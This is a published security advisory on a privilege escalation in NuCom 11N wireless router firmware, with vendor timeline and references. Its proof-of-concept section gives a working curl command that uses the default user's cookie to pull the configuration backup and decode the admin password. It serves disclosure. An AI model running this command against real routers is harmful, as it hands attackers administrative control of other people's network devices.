Gjoko KrsticZSL-2021-5629NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation
7.5 High
AI Score
Confidence
Low
Title: NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation
Advisory ID: ZSL-2021-5629
Type: Local/Remote
Impact: Privilege Escalation
Risk: (4/5)
Release Date: 10.03.2021
Summary
The NC routers upgrades your network to the next generation of WiFi. With combined wireless speeds of up to 1750 Mbps, the device provides better speeds and wireless range. Includes 2 FXS ports for any VoIP service. If you prefer a wired connection, the NC routers have gigabit ports to provide an incredibly fast, lag-free experience. 3.0 ports allow you to power a robust home Internet network by sharing printers, flash storage, FTP servers, or media players.
Description
The application suffers from a privilege escalation vulnerability. The non-privileged default user (user:user) can elevate his/her privileges by sending a HTTP GET request to the configuration backup endpoint and disclose the http super password (admin credentials) in Base64 encoded value. Once authenticated as admin, an attacker will be granted access to the additional and privileged pages.
Vendor
NUEVAS COMUNICACIONES IBERIA, S.A. - <https://www.nucom.es>
Affected Version
5.07.90_multi_NCM01
5.07.89_multi_NCM01
5.07.72_multi_NCM01
Tested On
GoAhead-Webs
Tenda
Vendor Status
[01.03.2021] Vulnerability discovered.
[08.03.2021] Vendor contacted.
[09.03.2021] No response from the vendor.
[10.03.2021] Public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://packetstormsecurity.com/files/161745>
[2] <https://www.exploit-db.com/exploits/49634>
[3] <https://cxsecurity.com/issue/WLB-2021030061>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/198068>
Changelog
[10.03.2021] - Initial release
[11.03.2021] - Added reference [1], [2] and [3]
[12.03.2021] - Added reference [4]
Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation
Vendor: NUEVAS COMUNICACIONES IBERIA, S.A.
Product web page: https://www.nucom.es
Affected version: 5.07.90_multi_NCM01
5.07.89_multi_NCM01
5.07.72_multi_NCM01
Summary: The NC routers upgrades your network to the next
generation of WiFi. With combined wireless speeds of up to
1750 Mbps, the device provides better speeds and wireless
range. Includes 2 FXS ports for any VoIP service. If you
prefer a wired connection, the NC routers have gigabit
ports to provide an incredibly fast, lag-free experience.
3.0 ports allow you to power a robust home Internet network
by sharing printers, flash storage, FTP servers, or media
players.
Desc: The application suffers from a privilege escalation
vulnerability. The non-privileged default user (user:user)
can elevate his/her privileges by sending a HTTP GET request
to the configuration backup endpoint and disclose the http
super password (admin credentials) in Base64 encoded value.
Once authenticated as admin, an attacker will be granted
access to the additional and privileged pages.
Tested on: GoAhead-Webs
Tenda
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5629
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php
01.03.2021
--
lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \
> curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \
> -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \
> grep -oP '(?<=http_supper_passwd=).*' | \
> base64 -d 2>/dev/null | \
> xargs echo -n ; \
> echo -e '\n-----------\n'
The admin password is:
MammaMia123
-----------
lqwrm@metalgear:~/prive$
</p></body></html>7.5 High
AI Score
Confidence
Low